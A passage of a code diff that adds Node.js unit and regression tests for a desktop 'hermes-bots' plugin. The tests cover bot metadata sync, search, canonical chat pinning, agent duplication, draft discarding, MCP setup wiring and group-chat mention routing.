+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__meta = { saveBotMeta, $botMeta };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  context.plugin.register({
+    storage: { get: () => null, set: () => undefined },
+    register: () => undefined
+  })
+  return { ...context.__meta, requests }
+}
+
+test('server persistence failure is returned while the local look remains saved', async () => {
+  const { saveBotMeta, $botMeta } = load({ applied: { ui_meta: false } })
+
+  const result = await saveBotMeta('researcher', {
+    shape: 'cloud',
+    color: '#38bdf8',
+    custom: true
+  })
+
+  assert.equal($botMeta.get().researcher.shape, 'cloud')
+  assert.equal($botMeta.get().researcher.color, '#38bdf8')
+  assert.equal(result.serverPersisted, false)
+  assert.equal(result.serverOutcome, 'failed')
+})
+
+test('server persistence success is returned after ui_meta is applied', async () => {
+  const { saveBotMeta } = load({ applied: { ui_meta: true } })
+
+  const result = await saveBotMeta('researcher', {
+    shape: 'hexagon',
+    color: '#8b5cf6',
+    custom: true
+  })
+
+  assert.equal(result.serverPersisted, true)
+  assert.equal(result.serverOutcome, 'persisted')
+})
+
+test('an older gateway (no applied contract) is unsupported, not failed', async () => {
+  const { saveBotMeta } = load({})
+
+  const result = await saveBotMeta('researcher', { shape: 'circle', custom: true })
+
+  assert.equal(result.serverOutcome, 'unsupported')
+  assert.equal(result.serverPersisted, false)
+})
+
+test('a rejected configure request is unsupported, not failed', async () => {
+  const { saveBotMeta } = load(() => Promise.reject(new Error('param shape rejected')))
+
+  const result = await saveBotMeta('researcher', { shape: 'circle', custom: true })
+
+  assert.equal(result.serverOutcome, 'unsupported')
+})
+
+test('Edit Profile waits for persistence and reports a local-only save', () => {
+  assert.match(pluginSource, /const persistence = await saveBotMeta\(bot\.name,/)
+  assert.match(pluginSource, /Saved look locally; remote persistence failed/)
+  // The toast fires only on an explicit remote failure — never on the
+  // documented older-gateway fallback.
+  assert.match(pluginSource, /serverOutcome === 'failed'/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/bot-meta-sync.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/bot-meta-sync.test.mjs
@@ -1,0 +1,81 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load() {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: { state: { profile: { listen: () => undefined } } },
+    sdk: new Proxy({}, { get: () => undefined })
+  }
+  const source = pluginSource
+    .replace(/^import \* as sdk from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat(`
+globalThis.__botMetaSync = {
+  get: () => $botMeta.get(),
+  set: value => $botMeta.set(value),
+  mergeServerMeta,
+  setPluginCtx: value => { pluginCtx = value }
+};
+`)
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return context.__botMetaSync
+}
+
+test('regression: authoritative server metadata removes stale local canonical chat', () => {
+  const writes = []
+  const sync = load()
+  sync.set({
+    default: {
+      chat: '4f6f6798ad6f',
+      shape: 'cloud',
+      image: 'data:image/png;base64,avatar',
+      pet: 'pet-cat'
+    }
+  })
+  sync.setPluginCtx({ storage: { set: (key, value) => writes.push({ key, value }) } })
+
+  sync.mergeServerMeta([
+    {
+      name: 'default',
+      ui_meta: {
+        'hermes-bots': { shape: 'cloud', color: '#8b5cf6', title: 'Hermana' }
+      }
+    }
+  ])
+
+  const current = sync.get().default
+  assert.equal(Object.hasOwn(current, 'chat'), false)
+  assert.equal(current.image, 'data:image/png;base64,avatar')
+  assert.equal(current.pet, 'pet-cat')
+  assert.equal(writes.at(-1).key, 'bot-meta')
+  assert.equal(Object.hasOwn(writes.at(-1).value.default, 'chat'), false)
+})
+
+test('compatibility: local canonical chat survives when gateway has no server bot metadata', () => {
+  const writes = []
+  const sync = load()
+  sync.set({ default: { chat: 'local-chat', shape: 'cloud' } })
+  sync.setPluginCtx({ storage: { set: (key, value) => writes.push({ key, value }) } })
+
+  sync.mergeServerMeta([{ name: 'default' }])
+
+  assert.equal(sync.get().default.chat, 'local-chat')
+  assert.equal(writes.length, 0)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/bots-search.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/bots-search.test.mjs
@@ -1,0 +1,69 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function loadFilter() {
+  const start = source.indexOf('function botHandle')
+  const end = source.indexOf('function slugify')
+
+  assert.ok(start >= 0 && end > start, 'bot identity helper block must remain extractable')
+
+  const context = {}
+  vm.runInNewContext(
+    `${source.slice(start, end)}\nglobalThis.__filterBots = filterBots;`,
+    context
+  )
+
+  return context.__filterBots
+}
+
+const roster = [
+  { name: 'agency-audio-designer', title: 'Audio Designer' },
+  { name: 'agency-ai-engineer', title: 'AI Engineer' },
+  { name: 'default' }
+]
+const meta = {
+  'agency-audio-designer': { title: 'Sound Studio' },
+  default: {}
+}
+
+test('bot search matches visible display names case-insensitively', () => {
+  const filterBots = loadFilter()
+
+  assert.deepEqual(
+    filterBots(roster, meta, 'SOUND').map(bot => bot.name),
+    ['agency-audio-designer']
+  )
+})
+
+test('bot search matches profile handles and preserves roster order', () => {
+  const filterBots = loadFilter()
+
+  assert.deepEqual(
+    filterBots(roster, meta, 'agency-').map(bot => bot.name),
+    ['agency-audio-designer', 'agency-ai-engineer']
+  )
+  assert.deepEqual(
+    filterBots(roster, meta, '@hermes').map(bot => bot.name),
+    ['default']
+  )
+  assert.deepEqual(
+    filterBots(roster, meta, 'default').map(bot => bot.name),
+    ['default']
+  )
+})
+
+test('blank bot search returns the existing roster reference', () => {
+  const filterBots = loadFilter()
+
+  assert.equal(filterBots(roster, meta, '   '), roster)
+})
+
+test('Bot pane renders the canonical search field and no-match state', () => {
+  assert.match(source, /jsx\(SearchField,\s*\{[\s\S]*?placeholder: 'Search bots…'/)
+  assert.match(source, /'aria-live': 'polite'/)
+  assert.match(source, /No bots match “\$\{query\.trim\(\)\}”/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs
@@ -1,0 +1,46 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function loadCanonicalCreation({ openSession, request }) {
+  const start = source.indexOf('const canonicalCreations = new Map()')
+  const end = source.indexOf('function displayName(', start)
+  const saved = []
+  const context = {
+    host: { openSession, request },
+    saveBotMeta: (name, patch) => saved.push({ name, patch }),
+    $hideBotChats: { get: () => false },
+    window: { setTimeout: callback => callback() }
+  }
+  const section = source
+    .slice(start, end)
+    .concat('\nglobalThis.__canonical = { createCanonicalChat };\n')
+
+  assert.notEqual(start, -1, 'canonical creation section is missing')
+  assert.notEqual(end, -1, 'canonical creation section delimiter is missing')
+  vm.runInNewContext(section, context, { filename: 'canonical-creation.js' })
+  return { ...context.__canonical, saved }
+}
+
+test('regression: navigation retries after the kickoff persists a new canonical chat', async () => {
+  const events = []
+  let attempts = 0
+  const runtime = loadCanonicalCreation({
+    openSession: async id => {
+      events.push(`open:${id}`)
+      attempts += 1
+      if (attempts === 1) throw new Error('stored row not persisted yet')
+    },
+    request: async method => {
+      if (method === 'session.create') return { stored_session_id: 'stored-1', session_id: 'runtime-1' }
+      if (method === 'prompt.submit') events.push('kickoff:persisted')
+      return {}
+    }
+  })
+
+  assert.equal(await runtime.createCanonicalChat('ops'), 'stored-1')
+  assert.deepEqual(events, ['open:stored-1', 'kickoff:persisted', 'open:stored-1'])
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-empty-recovery.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-empty-recovery.test.mjs
@@ -1,0 +1,45 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function loadCanonicalRecovery({ openSession, request }) {
+  const start = source.indexOf('const canonicalCreations = new Map()')
+  const end = source.indexOf('function displayName(', start)
+  const saved = []
+  const context = {
+    host: { openSession, request },
+    saveBotMeta: (name, patch) => saved.push({ name, patch }),
+    $hideBotChats: { get: () => false },
+    window: { setTimeout: callback => callback() }
+  }
+  const section = source
+    .slice(start, end)
+    .concat('\nglobalThis.__canonical = { openBotCanonicalChat };\n')
+
+  assert.notEqual(start, -1, 'canonical chat section is missing')
+  assert.notEqual(end, -1, 'canonical chat section delimiter is missing')
+  vm.runInNewContext(section, context, { filename: 'canonical-recovery.js' })
+  return { ...context.__canonical, saved }
+}
+
+test('regression: an empty session list clears a stale pin and creates a replacement', async () => {
+  const opened = []
+  const runtime = loadCanonicalRecovery({
+    openSession: async id => opened.push(id),
+    request: async method => {
+      if (method === 'session.list') return { sessions: [] }
+      if (method === 'session.create') return { stored_session_id: 'replacement', session_id: 'replacement-runtime' }
+      return {}
+    }
+  })
+
+  assert.equal(await runtime.openBotCanonicalChat('ops', 'stale-pin'), 'replacement')
+  assert.deepEqual(opened, ['replacement'])
+  assert.deepEqual(JSON.parse(JSON.stringify(runtime.saved)), [
+    { name: 'ops', patch: { chat: null } },
+    { name: 'ops', patch: { chat: 'replacement' } }
+  ])
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-pin.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-pin.test.mjs
@@ -1,0 +1,28 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// #24's guarantee (preserve a valid canonical pin instead of clobbering it from
+// a bounded session list) is now enforced inside openBotCanonicalChat(), which
+// #28 introduced to unify the create / recover / replace lifecycle. This test
+// pins that guarantee against the current structure: a valid pinned id present
+// in the session list must be opened as-is (never replaced), and only an
+// ACTUALLY-missing pin triggers recovery.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+const start = source.indexOf('async function openBotCanonicalChat(')
+assert.notEqual(start, -1, 'openBotCanonicalChat declaration is missing')
+const end = source.indexOf('\nfunction ', start)
+const fnSource = source.slice(start, end === -1 ? undefined : end)
+
+test('regression: a pinned canonical chat found in the list is opened, not replaced', () => {
+  // The pin is opened directly with its own id under the bot's profile.
+  assert.match(fnSource, /host\.openSession\(id, \{ profile: name \}\)/)
+  // Replacement (rows[0].id) only happens when the pin is NOT in the list...
+  assert.match(fnSource, /if \(!rows\.some\(session => session\.id === id\)\)/)
+  assert.match(fnSource, /id = rows\[0\]\.id/)
+  // ...and an empty list clears the stale pin before recreating (the #28 fix),
+  // rather than opening a known-bad id.
+  assert.match(fnSource, /if \(!rows\.length\)/)
+  assert.match(fnSource, /return createCanonicalChat\(name\)/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/create-agent-clone-default.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/create-agent-clone-default.test.mjs
@@ -1,0 +1,21 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// CreateAgentDialog seeds cloneFrom with useState('default') — "Clone from:
+// default (the main profile)" — but reset() restored it to '__none__' ("Fresh
+// profile"). The first dialog open cloned the main profile; every later open
+// after a create/cancel silently defaulted to a fresh profile. reset() must
+// restore the same default the dialog was mounted with.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+const initialMatch = source.match(/const \[cloneFrom, setCloneFrom\] = useState\('([^']+)'\)/)
+assert.ok(initialMatch, 'cloneFrom useState initializer is missing')
+
+test('regression: New Agent reset restores the initial clone-from default', () => {
+  const initial = initialMatch[1]
+  assert.equal(initial, 'default')
+  assert.match(source, new RegExp(`setCloneFrom\\('${initial}'\\)`))
+  assert.doesNotMatch(source, /setCloneFrom\('__none__'\)/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/create-agent-mcp-setup.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/create-agent-mcp-setup.test.mjs
@@ -1,0 +1,48 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// The New Agent dialog must let you configure MCP OAuth / API-key credentials
+// DURING creation (not force create-then-edit). It does this by lazily
+// materializing the profile on first setup via ensureAgentCreated(), passed to
+// McpSetupButton as ensureProfile.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+test('McpSetupButton accepts an ensureProfile callback and resolves the profile lazily', () => {
+  const fn = source.slice(
+    source.indexOf('function McpSetupButton('),
+    source.indexOf('function botAppearance(')
+  )
+  // Signature carries ensureProfile.
+  assert.match(fn, /function McpSetupButton\(\{ profile, entry, onDone, ensureProfile \}\)/)
+  // resolveProfile falls back to ensureProfile() when no profile is set yet.
+  assert.match(fn, /const resolveProfile = async \(\) =>/)
+  assert.match(fn, /const created = await ensureProfile\(\)/)
+  // Both credential paths resolve the profile before adding the server.
+  const beginKeys = fn.slice(fn.indexOf('const beginKeys ='), fn.indexOf('const submitKeys ='))
+  assert.match(beginKeys, /const profile = await resolveProfile\(\)/)
+  const beginOAuth = fn.slice(fn.indexOf('const beginOAuth ='), fn.indexOf('if (supported === false)'))
+  assert.match(beginOAuth, /const profile = await resolveProfile\(\)/)
+})
+
+test('CreateAgentDialog materializes the profile lazily and idempotently', () => {
+  const fn = source.slice(
+    source.indexOf('function CreateAgentDialog('),
+    source.indexOf('function RoutinesPane(') > source.indexOf('function CreateAgentDialog(')
+      ? source.indexOf('function RoutinesPane(')
+      : source.length
+  )
+  // Idempotent creation guard shares the in-flight creation promise.
+  assert.match(fn, /const ensureAgentCreated = \(\) =>/)
+  assert.match(fn, /singleFlight\(flightRef, async \(\) =>/)
+  // The slug ref stays a string for its sibling consumers (taken check,
+  // draft discard, MCP setup profile param).
+  assert.match(fn, /createdRef\.current = slug/)
+  // submit() routes through the same helper (no duplicate profiles.create).
+  assert.match(fn, /const slugCreated = await ensureAgentCreated\(\)/)
+  // The MCP setup button in Create is wired to lazy creation, not disabled.
+  assert.match(fn, /ensureProfile: ensureAgentCreated/)
+  // The dead "save the agent first" gate is gone.
+  assert.doesNotMatch(source, /save the agent first/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/draft-agent-discard.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/draft-agent-discard.test.mjs
@@ -1,0 +1,36 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// New Agent's lazily-materialized profile (Capabilities tab / MCP setup) is a
+// DRAFT until Create Agent is pressed: cancelling the dialog must delete it so
+// preconfigure-then-back-out leaves zero residue.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+test('discardDraft deletes the materialized draft via deleteBot', () => {
+  assert.match(source, /const discardDraft = \(\) => \{/)
+  assert.match(source, /void deleteBot\(\{ name: draft \}\)/)
+  // Ref cleared FIRST so a re-entrant cancel can't double-delete.
+  assert.match(source, /createdRef\.current = null\n\s*flightRef\.current = null\n\s*void deleteBot/)
+})
+
+test('both cancel paths discard the draft (esc/overlay + Cancel button)', () => {
+  const dialogClose = /discardDraft\(\)\s*\n\s*reset\(\)\s*\n\s*onClose\(\)/g
+  const hits = source.match(dialogClose) || []
+  assert.ok(hits.length >= 2, `expected discardDraft before reset/onClose in both cancel paths, found ${hits.length}`)
+})
+
+test('successful create does NOT discard: reset clears createdRef before close', () => {
+  // reset() nulls the ref, so the dialog-close discard becomes a no-op after
+  // a real Create.
+  assert.match(source, /setError\(null\)\n\s*createdRef\.current = null\n\s*flightRef\.current = null\n\s*\}/)
+})
+
+test('renaming after materialization discards the orphaned draft', () => {
+  assert.match(source, /createdRef\.current && createdRef\.current !== slug/)
+})
+
+test("the draft's own slug does not read as taken", () => {
+  assert.match(source, /roster\.some\(b => b\.name === slug && b\.name !== createdRef\.current\)/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/duplicate-bot.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/duplicate-bot.test.mjs
@@ -1,0 +1,87 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load() {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const calls = []
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      state: { profile: { listen: () => undefined } },
+      request: async (method, params) => {
+        calls.push({ method, params })
+        return { ok: true }
+      }
+    }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__dup = { duplicateBot, $botMeta };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return { context, calls }
+}
+
+test('unit: duplicate copies the look but not the source chat pin', async () => {
+  const { context, calls } = load()
+  const { duplicateBot, $botMeta } = context.__dup
+  $botMeta.set({
+    researcher: {
+      shape: 'circle',
+      color: '#f97316',
+      title: 'Researcher',
+      image: 'data:image/png;base64,xx',
+      chat: 'sess-source-forever',
+      created: 1700000000000
+    }
+  })
+
+  const name = await duplicateBot({ name: 'researcher', description: 'finds things' }, [{ name: 'researcher' }])
+  assert.equal(name, 'researcher-2')
+
+  const clone = $botMeta.get()['researcher-2']
+  assert.equal(clone.shape, 'circle')
+  assert.equal(clone.color, '#f97316')
+  assert.equal(clone.image, 'data:image/png;base64,xx')
+  assert.equal(clone.title, 'Researcher (copy)')
+  assert.equal(clone.chat, undefined)
+  assert.equal(clone.created, undefined)
+
+  const created = calls.find(c => c.method === 'profiles.create')
+  assert.equal(created.params.clone_from, 'researcher')
+  assert.equal(created.params.name, 'researcher-2')
+
+  const configure = calls.filter(c => c.method === 'profiles.configure')
+  assert.ok(configure.length)
+  const ui = configure[configure.length - 1].params.ui_meta['hermes-bots']
+  assert.equal(ui.chat, undefined)
+  assert.equal(ui.created, undefined)
+  assert.equal(ui.title, 'Researcher (copy)')
+})
+
+test('regression: a bot with no pin still duplicates its look', async () => {
+  const { context } = load()
+  const { duplicateBot, $botMeta } = context.__dup
+  $botMeta.set({ painter: { shape: 'cloud', color: '#38bdf8', title: 'Painter' } })
+  const name = await duplicateBot({ name: 'painter' }, [{ name: 'painter' }])
+  const clone = $botMeta.get()[name]
+  assert.equal(clone.title, 'Painter (copy)')
+  assert.equal(clone.shape, 'cloud')
+  assert.equal(clone.chat, undefined)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/embed-real-capabilities.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/embed-real-capabilities.test.mjs
@@ -1,0 +1,33 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// The bot editor (Edit Profile → Advanced) must render the REAL core Capabilities
+// components — ToolsetConfigPanel (full per-toolset env/keys/model/post-setup)
+// and McpTab (per-server enable + OAuth + API-key setup) — scoped to the bot's
+// profile, instead of bare checkbox stand-ins. Both are feature-detected so the
+// plugin still loads on older desktop builds that don't export them yet.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+test('resolves optional Capabilities components from the SDK namespace', () => {
+  assert.match(source, /import \* as sdk from '@hermes\/plugin-sdk'/)
+  assert.match(source, /const \{ McpTab, ToolsetConfigPanel \} = sdk/)
+})
+
+test('AdvancedProfileConfig embeds ToolsetConfigPanel per toolset, scoped to the bot profile', () => {
+  // Rendered only when the SDK export exists (older builds: just the toggle).
+  assert.match(source, /ToolsetConfigPanel\s*\n?\s*\?\s*jsx\('div'/)
+  assert.match(source, /jsx\(ToolsetConfigPanel, \{ toolset: tset\.name, profile: bot \}\)/)
+})
+
+test('AdvancedProfileConfig embeds the real McpTab with a live gateway + profile, feature-detected', () => {
+  assert.match(source, /McpTab && typeof host\.getGateway === 'function'/)
+  assert.match(source, /jsx\(McpTab, \{ gateway: host\.getGateway\(\), profile: bot \}\)/)
+})
+
+test('older-build fallback: the checkbox MCP list + inline McpSetupButton is still present', () => {
+  // The graceful path for desktops without the SDK export must remain intact.
+  assert.match(source, /jsx\(McpSetupButton, \{/)
+  assert.match(source, /No MCP servers configured or in the catalog\./)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/embed-skills-view.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/embed-skills-view.test.mjs
@@ -1,0 +1,37 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// Newer desktop builds export the WHOLE core Capabilities surface (SkillsView,
+// hermes-agent#87317). The bot editor's Advanced section must render it pinned
+// to the bot's profile — in Edit Profile directly, and in New Agent behind a
+// Capabilities tab that materializes the profile first. Feature-detected so
+// the plugin still loads (and keeps its checklist UI) on older desktops.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+test('resolves SkillsView as an optional SDK namespace export', () => {
+  assert.match(source, /import \* as sdk from '@hermes\/plugin-sdk'/)
+  assert.match(source, /const SkillsView = typeof sdk === 'undefined' \? undefined : sdk\.SkillsView/)
+})
+
+test('Edit Profile renders the pinned Capabilities surface when the export exists', () => {
+  assert.match(source, /if \(SkillsView\) \{/)
+  assert.match(source, /jsx\(SkillsView, \{ embedded: true, fixedProfile: bot \}\)/)
+})
+
+test('New Agent gains a Capabilities tab that materializes the profile first', () => {
+  // Tab list swaps to General + Capabilities on newer builds…
+  assert.match(source, /\['capabilities', 'Capabilities'\]/)
+  // …and opening it creates the profile through the same lazy door MCP setup uses.
+  assert.match(source, /id === 'capabilities'/)
+  assert.match(source, /ensureAgentCreated\(\)\s*\n?\s*\.then\(created => created && setCreatedForCaps\(created\)\)/)
+  assert.match(source, /jsx\(SkillsView, \{ embedded: true, fixedProfile: createdForCaps \}\)/)
+})
+
+test('older-build fallback keeps the checklist UI intact', () => {
+  // The staged CheckList sections and the hub search section must survive for
+  // desktops without the SkillsView export.
+  assert.match(source, /jsx\(CheckList, \{ items: visibleSkills/)
+  assert.match(source, /jsx\(HubSkillsSection, \{/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/group-chat.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/group-chat.test.mjs
@@ -1,0 +1,245 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+/** Load the plugin in a vm with a scripted cli.exec so member turns are
+ *  deterministic. `turnScript(profile, prompt)` returns the member's reply
+ *  text (or throws to simulate a failed turn). */
+function load(turnScript) {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const calls = []
+  const transcripts = new Map()
+  const context = {
+    atom,
+    setTimeout: fn => {
+      fn()
+      return 0
+    },
+    clearTimeout: () => undefined,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      request: async (method, params) => {
+        if (method === 'session.create') {
+          return { session_id: `rt-${params.profile}`, stored_session_id: `sid-${params.profile}`, message_count: 0, messages: [] }
+        }
+        if (method === 'session.resume') {
+          const profile = params.profile
+          const transcript = transcripts.get(profile) || []
+          return { session_id: `rt-${profile}`, messages: transcript, inflight: false, running: false }
+        }
+        if (method === 'prompt.submit') {
+          const profile = String(params.session_id).replace(/^rt-/, '')
+          const transcript = transcripts.get(profile) || []
+          transcript.push({ role: 'user', content: params.text })
+          calls.push({ profile, prompt: params.text })
+          const reply = turnScript(profile, params.text, calls.length)
+          transcript.push({ role: 'assistant', content: reply })
+          transcripts.set(profile, transcript)
+          return {}
+        }
+        return {}
+      },
+      state: { profile: { get: () => 'default', listen: () => undefined }, gateway: { listen: () => undefined } },
+      notify: () => undefined,
+      notifyError: () => undefined
+    }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat(
+      '\nglobalThis.__gc = { sendToGroupChat, runGroupChatRounds, resolveGroupResponders, parseGroupChatMentions, rotateGroupSpeakers, isGroupPassText, formatGroupChatLine, buildGroupChatTurnPrompt, trimGroupChatLog, $groupChats, $groupNeedsYou, GROUP_CHAT_MAX_ROUNDS, GROUP_CHAT_MAX_MESSAGES };\n'
+    )
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  context.plugin.register({ storage: { get: () => null, set: () => undefined }, register: () => undefined })
+  return { ...context.__gc, calls }
+}
+
+const MEMBERS = [{ name: 'research', title: '' }, { name: 'builder', title: '' }, { name: 'ops', title: 'The Ops' }]
+
+function roomLog(gc, group) {
+  return (gc.$groupChats.get()[group] || { log: [] }).log
+}
+
+test('pass detection: (pass), pass, pass., empty are silence; real text is not', () => {
+  const gc = load(() => '(pass)')
+  assert.equal(gc.isGroupPassText('(pass)'), true)
+  assert.equal(gc.isGroupPassText('pass'), true)
+  assert.equal(gc.isGroupPassText('Pass.'), true)
+  assert.equal(gc.isGroupPassText('  '), true)
+  assert.equal(gc.isGroupPassText('I will pass this to ops'), false)
+})
+
+test('mention routing: only @-mentioned members respond; @everyone or none = all', () => {
+  const gc = load(() => '(pass)')
+  const log = [{ from: { kind: 'user', name: 'You' }, text: '@builder take this one', at: 1 }]
+  const one = gc.resolveGroupResponders(log, MEMBERS)
+  assert.equal(JSON.stringify(one.map(m => m.name)), JSON.stringify(['builder']))
+
+  const all = gc.resolveGroupResponders([{ from: { kind: 'user', name: 'You' }, text: 'hello team', at: 1 }], MEMBERS)
+  assert.equal(all.length, 3)
+
+  const everyone = gc.resolveGroupResponders(
+    [{ from: { kind: 'user', name: 'You' }, text: '@everyone standup', at: 1 }],
+    MEMBERS
+  )
+  assert.equal(everyone.length, 3)
+})
+
+test('mention routing: display titles resolve to the member and @user never matches a bot', () => {
+  const gc = load(() => '(pass)')
+  const parsed = gc.parseGroupChatMentions('@theops please check, then ping @user', MEMBERS)
+  assert.equal(parsed.mentioned.has('ops'), true)
+  assert.equal(parsed.mentioned.size, 1)
+})
+
+test('a member @-mentioned by another bot joins the NEXT round', async () => {
+  const gc = load((profile, prompt) => {
+    if (profile === 'research' && !prompt.includes('(you)')) {
+      return 'Interesting — @builder should own this.'
+    }
+    if (profile === 'builder') {
+      return 'On it. OWNER: @builder.'
+    }
+    return '(pass)'
+  })
+
+  gc.sendToGroupChat('Core', [{ name: 'research', title: '' }, { name: 'builder', title: '' }], '@research thoughts?')
+  await new Promise(resolve => setTimeout(resolve, 0))
+  await new Promise(resolve => setImmediate(resolve))
+  // Drain the async loop: poll until running flips false.
+  for (let i = 0; i < 200 && (gc.$groupChats.get().Core || {}).running; i++) {
+    await new Promise(resolve => setImmediate(resolve))
+  }
+
+  const texts = roomLog(gc, 'Core').map(e => `${e.from.name}: ${e.text}`)
+  assert.equal(texts.some(t => t.startsWith('research:')), true)
+  assert.equal(texts.some(t => t.startsWith('builder: On it')), true)
+})
+
+test('settle: everyone passing ends the room turn with only the user message logged', async () => {
+  const gc = load(() => '(pass)')
+
+  gc.sendToGroupChat('Quiet', MEMBERS, 'fyi, deploy went out')
+  for (let i = 0; i < 200 && (gc.$groupChats.get().Quiet || {}).running; i++) {
+    await new Promise(resolve => setImmediate(resolve))
+  }
+
+  const log = roomLog(gc, 'Quiet')
+  assert.equal(log.length, 1)
+  assert.equal(log[0].from.kind, 'user')
